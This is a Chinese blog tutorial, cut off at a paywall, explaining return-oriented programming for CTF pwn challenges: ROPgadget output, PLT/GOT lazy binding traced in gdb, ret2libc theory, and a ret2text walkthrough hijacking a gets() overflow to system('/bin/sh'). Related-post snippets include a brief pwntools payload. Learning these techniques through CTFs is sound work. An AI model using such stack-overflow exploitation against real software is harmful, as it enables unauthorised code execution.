基本ROP

最新推荐文章于 2023-02-21 18:49:16 发布
最新推荐文章于 2023-02-21 18:49:16 发布
阅读量913 收藏
点赞数
分类专栏: CTF-PWN-栈溢出 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49959202/article/details/119686463
版权
本文详细介绍了返回导向编程(ROP)的概念、原理和分类,包括ret2text、ret2shellcode、ret2syscall以及ret2libc,并通过实例深入解析了每个分类下的漏洞利用方法,涉及到plt表、got表、动态链接库加载原理以及如何通过ROP技术劫持程序执行流。此外,文章还展示了如何利用gdb、cyclic工具和ida进行漏洞分析和利用payload的编写。
摘要由CSDN通过智能技术生成

文章目录

基本ROP

1.原理

1.1 概念原理

ROP(Return Oriented Programming),中文名返回导向编程,即利用return语句跳转到指定位置,对程序的控制流进行劫持。它是建立在栈溢出的基础上,利用现有的小片段(gadgets)来改变寄存器或者变量的值,从而改变程序的执行流程。

gadget是以ret指令结尾的指令片段,如下所示即为某个gadget:

$ ROPgadget --binary ret2libc2 --only "pop|ret"
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

Unique gadgets found: 7

使用ROP要满足两个条件:

  1. 程序存在栈溢出
  2. 程序里面能够找到可用的gadget

1.2 分类

1.2.1 ret2text

在代码段中直接发现需要使用的片段,如 sysystem("\bin\sh"),那么控制程序直接跳转到这个地方

1.2.2 ret2shellcode

上面的ret2text已经拥有了某些可以直接用来获取系统shell的函数,但是很多时候程序是不会有这样的语句的,因此需要我们自己去填充shellcode。当自己完成填充shellcode后,利用栈溢出使得程序跳转到shellcode的位置。

1.2.3 ret2syscall

这次劫持执行流,劫持的是系统调用,即syscall,通过给syscall传入不同的参数,可以实现对不同函数的劫持,比如劫持sysystem("\bin\sh"),劫持write()函数

系统调用参考博客:https://blog.csdn.net/qq_33948522/article/details/93880812

Linux的系统调用通过int 80h实现,用系统调用号来区分入口函数。

操作系统实现系统调用的基本过程是:

  1. 应用程序调用库函数(API)
  2. API将系统调用号存入EAX,然后通过中断调用使系统进入内核态
  3. 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用)
  4. 系统调用完成相应功能,将返回值存入EAX,返回到中断处理函数
  5. 中断处理函数返回到API中
  6. API将EAX返回给应用程序

应用程序调用系统调用的过程是:

  1. 把系统调用的编号存入EAX;
  2. 把函数参数存入其它通用寄存器
  3. 触发0×80号中断(int 0x80)
1.2.4 ret2libc
1.2.4.1 plt表与got表(延迟绑定机制)
1.2.4.1.1 原理介绍

plt表于got表的关系如下图所示:

对于某一个函数(比如gets()函数,这里假设它对应于plt[1]),两次寻址的方式是不一样的。

第一次寻址:

  1. 当程序调用gets()函数,那么gets()函数会去plt[1]寻址
  2. plt[1]内部存储的是3条汇编指令,先执行第一条汇编执行 jmp [got[3]]。
  3. got[3]在第一次被访问时,里面存储的是addr,即跳转到plt[1]中第二条汇编指令的地址,因此程序跳转到addr的位置
  4. 程序执行plt[1]第二条汇编指令:push reloc_arg,将_dl_runtime_resolve第二个参数压栈
  5. 程序执行plt[1]第三条汇编指令:jmp plt[0]
  6. plt[0]内部存储2条汇编指令,首先执行第一条:push [got[1]],将_dl_runtime_resolve第一个参数压栈
  7. plt[0]执行第二条指令:jmp [got[2]],即让程序执行_dl_runtime_resolve()函数,而先前它的两个参数都已经被压入栈了。
  8. 执行完_dl_runtime_resolve(link_map , reloc_arg)函数,获得了gets()函数的真实地址,存储在got[1]内。

第二次寻址:

  1. 程序调用gets()函数,gets()函数会去plt[1]寻址
  2. plt[1]存储了got[3]的地址,因此程序跳转到got[3]
  3. got[3]存储了gets()函数的真实地址,直接把这个真实地址返回,得到了gets()的真实地址

下面

1.2.4.1.2 实例调试

下面对于第一次寻址进行调试分析:

调试代码main.c:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
void vuln() {
   
    char buf[100];
    setbuf(stdin, buf);
    read(0, buf, 256);
}
int main() {
   
    char buf[100] = "Welcome to XDCTF2015~!\n";
    setbuf(stdout, buf);
    write(1, buf, strlen(buf));
    vuln();
    return 0;
}

编译命令:

gcc -o main -m32 -fno-stack-protector main.c -no-pie

首先看一下几个关键位置:

.plt:

$ objdump -d main | grep plt
Disassembly of section .plt:
08049030 <.plt>:

调用write函数位置:

$ objdump -d main | grep write@plt
080490d0 <write@plt>:
 80492ce:       e8 fd fd ff ff          call   80490d0 <write@plt>

gdb调试如下:

首先打个断点:

pwndbg> b *0x80492ce
Breakpoint 1 at 0x80492ce
pwndbg> r
Starting program: /mnt/d/study/ctf/资料/ctf-challenges/pwn/stackoverflow/ret2dlresolve/main

程序停在第一次调用write()的位置:

 ► 0x80492ce <main+142>    call   write@plt <write@plt>
        fd: 0x1
        buf: 0xffffd0bc ◂— 'Welcome to XDCTF2015~!\n'
        n: 0x17

进入write@plt看看:

pwndbg> si
0x080490d0 in write@plt ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────[ REGISTERS ]────────
 EAX  0xffffd0bc ◂— 'Welcome to XDCTF2015~!\n'
 EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x804bf0c (_DYNAMIC) ◂— 0x1
 ECX  0x2f8c
 EDX  0x3
 EDI  0xffffd120 ◂— 0x1
 ESI  0xf7fb4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
 EBP  0xffffd138 ◂— 0x0
*ESP  0xffffd09c —▸ 0x80492d3 (main+147) ◂— 0xe810c483
*EIP  0x80490d0 (write@plt) ◂— 0xfb1e0ff3
───────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────────
 ► 0x80490d0  <write@plt>      endbr32 
   0x80490d4  <write@plt+4>    jmp    dword ptr [0x804c01c] <0x8049080>
    ↓
   0x8049080                   endbr32

发现程序会在0x80490d4产生jmp指令,跳转到[0x804c01c]。

而从

EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x804bf0c (_DYNAMIC) ◂— 0x1

我们可以知道 0x804c000是got表首地址,因此 0x804c01c 其实是 got + 0x1c (0x804c01c - 0x804c000 = 0x1c)。这个地方是当前plt[“write”]对应的got[“write”],里面的内容是0x8049080。

pwndbg> x/x 0x804c01c
0x804c01c <write@got.plt>:      0x08049080

因此要进行 jmp 0x8049080,也就是跳转到write[“plt”]中的下一条汇编指令。执行:0x8049080 endbr32

程序继续往下:

pwndbg> si
0x08049084 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────────────
 EAX  0xffffd0bc ◂— 'Welcome to XDCTF2015~!\n'
 EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x804bf0c (_DYNAMIC) ◂— 0x1
 ECX  0x2f8c
 EDX  0x3
 EDI  0xffffd120 ◂— 0x1
 ESI  0xf7fb4000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c
 EBP  0xffffd138 ◂— 0x0
 ESP  0xffffd09c —▸ 0x80492d3 (main+147) ◂— 0xe810c483
*EIP  0x8049084 ◂— 0x2068 /* 'h ' */
───────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────────
   0x80490d0  <write@plt>      endbr32 
   0x80490d4  <write@plt+4>    jmp    dword ptr [0x804c01c] <0x8049080>
    ↓
   0x8049080                   endbr32 
 ► 0x8049084                   push   0x20
   0x8049089                   jmp    0x8049030 <0x8049030>

开始将0x20压入栈,这个_dl_runtime_resolve()的第二个参数reloc_arg。

然后jmp到0x8049030,也就是jmp 到 plt[0]。

plt[0]里面存放的是2条汇编指令,一个是把got[1]压栈,也就是把 link_map 的地址(_dl_runtime_resolve()函数的第一个参数)压栈;另外一条跳转到got[2],也就是0x804c008 (0x804c008 - 0x804c000 = 8,8 / 4 = 2),这个got[2]里面存放的就是动态链接器_dl_runtime_resolve的入口地址。

   0x8049080                   endbr32 
   0x8049084                   push   0x20
   0x8049089                   jmp    0x8049030 <0x8049030>
    ↓
 ► 0x8049030                   push   dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804c004>
   0x8049036                   jmp    dword ptr [0x804c008] <0xf7fe7b10>
    ↓

然后程序执行_dl_runtime_resolve(link_map, reloc_arg)。

调用write@plt结束:

   0xf7ebecda <write+58>    pop    esi
   0xf7ebecdb <write+59>    ret    
    ↓
   0x80492d3  <main+147>    add    esp, 0x10
 ► 0x80492d6  <main+150>    call   vuln <vuln>
        arg[0]: 0x0
        arg[1]: 0x1
        arg[2]: 0xf7ffd990 ◂— 0x0
        arg[3]: 0x636c6557 ('Welc')

看一下got[“write”]内写的是什么:

pwndbg> x/x 0x804c01c
0x804c01c <write@got.plt>:      0xf7ebeca0

这个时候里面的内容就和原来的 0x8049080 不一样了,存储的是write()函数的真实地址。

1.2.4.2 动态链接库加载原理

*.so文件在程序运行时会被加载到内存中,如果程序开启了aslr,那么每次加载时的基地址是不一样的。但是其中包含的函数,诸如system()函数、write()函数,还要很多的需要的字符串,诸如"\bin\sh",这些东西相对于及地址的偏移量都是固定的。因此,如果能够泄露出libc的基地址,那么计算出偏移量,就能够找到这些函数、字符串在内存中的真实地址。

其他知识点:

  1. libc.so 动态链接库中的函数之间相对偏移是固定的。
  2. 即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。比如puts函数的真实地址0xf7d54360,它的低十二位是360,在任意一个libc内都是360。

那么如何得到 libc 中的某个函数的地址呢?我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。当然,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。

1.2.4.3 ret2libc基本原理

ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。

ret2libc下面有三个变形:

  1. ret2libc1:有system,有”\bin\sh“

  2. ret2libc2:有system,无”\bin\sh“

  3. ret2libc3:无system,无”\bin\sh“

2.例题

2.1 ret2text

2.1.1 习题信息

题目来自ctf-wiki中,路径:ctf-challenges\pwn\stackoverflow\ret2text\bamboofox-ret2text

2.1.2 程序分析

查看一下基本的保护机制:

$ checksec ret2text
[*] '/mnt/c/Users/Chance/Desktop/bamboofox-ret2text/ret2text'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

可用看出来是32位程序,然后开了nx

使用ida看一下main函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
   
  int v4; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets((char *)&v4);
  printf("Maybe I will tell you next time !");
  return 0;
}

发现上面第8行存在危险函数gets(),可用用来进行栈溢出

2.1.3 漏洞定位

因为看到了gets函数,它的输入是v4,而gets函数没有限制输入的长度,这里存在栈溢出漏洞

2.1.4 漏洞利用

基于上面的分析,可用使用输入的字符串淹没ret,然后控制程序跳转到 secure中的system("/bin/sh")中去

通过ida分析出来,我们知道system("/bin/sh")的地址是:0804863A ,注意不是直接从_system开始,而是要从前一行开始,因为那里传参也得包含进去

.text:08048626                 mov     dword ptr [esp], offset unk_8048760
.text:0804862D                 call    ___isoc99_scanf
.text:08048632                 mov     eax, [ebp+input]
.text:08048635                 cmp     eax, [ebp+secretcode]
.text:08048638                 jnz     short locret_8048646
.text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"
.text:08048641                 call    _system

因此在ret的位置,我们只需要填上0804863A 即可劫持程序的执行流到system位置

注意:这里能够看到system("/bin/sh")的绝对地址是因为程序没有开启PIE(从前面checksec可以看出来),如果开启了PIE,那么IDA分析出来的是相对的偏移量,比如0x0000063A,那么就需要计算libc基地址,然后绝对地址=libc基地址+0x0000063A

那么现在如何确定要填充的长度,保证能够淹没返回地址ret?

2.1.4.1 方法一:gdb手工计算

在gets()函数打断点

pwndbg> b gets
Breakpoint 1 at 0x8048460
pwndbg> r
Starting program: /mnt/c/Users/Chance/Desktop/bamboofox-ret2text/ret2text
There is something amazing here, do you know anything?

在gets位置停下,步过若干次,后输入若干个’A’

pwndbg> n
AAAAAAAA

跳出gets()函数

pwndbg> fin
Run till exit from #0  _IO_gets (buf=0xffffd21c "") at iogets.c:39
main () at ret2text.c:25
25
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
[网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
栈溢出的第一步进阶——ROP返回导向编程
XJJ的博客
05-01 764
前面两次栈溢出只是让我们学习原理,是最简单、最基本的栈溢出问题,一般的pwn题不会这么简单,溢出一次就可以到位。今天我们就做第一步进阶,正式进入ROP。 就我目前理解的ROP,就是要通过连续多次栈溢出,利用其原有的gadget(可以叫做代码片段),构造一次系统调用,调用execve()函数,就相当于获得了一个shell。首先我们要知道,系统调用的中断号是0x80,而execve的功能号是11,也就是16进制的0xb。所以在进行系统调用(即执行INT 80H这条语句)之前,我们先要构造出调用execve()
PWN1|WP
l2645470582_的博客
04-11 703
1.检查保护机制 开启了堆栈保护 2.用32位IDA打开该文件 1.shift+f12查看字符串,我们看到有“/bin/sh”关键字符串字样 2. system("/bin/sh")地址为0x0804863A 3.进入main函数,我们看到gets()危险函数 因为gets()函数不限制用户输入,s长度为0x64,所以造成溢出 4.gdb调试 (1)cyclic 200 生成200个有序字符 (2)gdb ./pwn1 run命令运行 g...
好好说话之ret2shellcode
hollk’s blog
06-22 1786
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
基本ROP技巧总结
极目楚天舒的博客
05-06 5742
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
64位栈溢出简单rop与简单例题的复现
goat_2003的博客
09-18 701
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
ROP基本原理和实战教学,看这一篇就够了
最新发布
QL_2023的博客
02-21 2422
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
软件安全实验——lab7(缓冲区溢出3:返回导向编程技术ROP
Onlyone_1314的博客
08-05 2720
目录标题1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm)(1)ROP在X86指令集上的实例(2)ROP在ARM上的可行性2、举例描述一个远程缓冲区溢出,思考和本地溢出的区别,攻击难点在哪里?3、描述arm和x64下的缓冲区溢出,比较和x86的差异。 1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm) ROP(Return-oriented programming),即“返
pwn 暑假复习二 简单rop
SsMing的博客
07-14 2077
例一:ret2shellcode 先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。先用ida打开查看源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvb...
ROP 返回导向编程 攻击
10-29 4286
之前工作中一直研究ARM 体系结构函数调用标准(AAPCS),分析栈中内存溢出对ARM 体系结构函数调用产生的影响。 Android 的流行促进了hacker 对 Android root 的研究,最出名的莫过于 基于堆栈溢出攻击的 ROP gadgets ROOT方法。 首先看下ROP基本概念(摘自wiki): http://zh.wikipedia.org/wiki/%E8%B
【pwn学习】pwn中直接调用system和调用call system的区别
Morphy_Amo的博客
12-06 2563
以 XCTF-pwn-新手区-004 为例, 本题在构造payload的时候有两种方式构造 第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址 system_addr = 0x08048320 binsh_addr = 0x0804a024 payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr) 第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用syste
[pwn] - xctf题目wp
s11show_163的博客
04-26 366
int_overflow exp.py: #!/usr/bin/env python from pwn import * sh = remote("124.126.19.106",42438) flag_addr=0x08048694 payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5) #‘A’*0x14是...
linux内核rop姿势详解,[原创]rop链攻击原理与思路(x86/x64)
weixin_42397925的博客
05-02 874
rop链的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 901
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
ROP(Return Oriented Programming)原理解析
热门推荐
Netfilter
09-17 1万+
先看一个代码: #include <stdio.h> #include <stdlib.h> // 下面的dummy_libc_part1和dummy_libc_part2假设是GLIBC库里的任意两段函数 void dummy_libc_part1() { // ... 这里可能会有别的指令 __asm("mov 0(%rsp), %rdi"); __asm("popq %r13"); __asm("call *%r14"); __asm("ret"); // ...
2019.7.26 攻防世界Stack2 以及gdb 和IDA算偏移
DSR446的博客
08-19 2523
我们很明显这里有一个数组越界的漏洞我们可以利用。 [这个博客写的很详细]https://blog.csdn.net/qq_41071646/article/details/86600053 下面我就只介绍一下怎么算的偏移。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值